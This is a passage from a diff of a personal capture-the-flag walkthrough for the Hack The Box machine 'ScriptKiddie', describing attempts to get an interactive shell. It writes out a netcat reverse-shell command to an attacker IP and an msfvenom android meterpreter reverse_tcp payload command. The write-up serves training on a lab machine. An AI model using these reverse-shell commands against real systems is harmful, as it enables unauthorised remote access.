jsom1/jsom1.github.io/_walkthroughs/ScriptKiddie.md

 ![Catch rev shell]({{https://jsom1.github.io/}}/_images/htb_sk_shell.png)
 </div>

 We have a shell, but we can't execute anything.
-I also tried with a bind shell, I can connect to it but can't execute any command either.
-Let's try with Metasploit's multi/handler.
-We first set the options correctly:
+In the image above, I executed some commands to go from a non-interactive shell to an interactive one, but it didn't work (from the post https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell/p1).
+The same happens with a bind shell.
+I also tried to specify /bin/bash in the payload's command (*sudo nc -nv 10.10.14.22 4444 -e /bin/bash*), but in that case we don't even catch a shell back.\\
+Let's try with Metasploit's multi/handler (we saw at the end of the script that the command executed by the server is *msfvenom -x evil.apk -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null*), as it might be better at catching specific payload shells.
+We set up the different options and select an android/meterpreter/reverse_tcp payload:

 <div class="img_container">
 ![multi handler]({{https://jsom1.github.io/}}/_images/htb_sk_multihandler.png)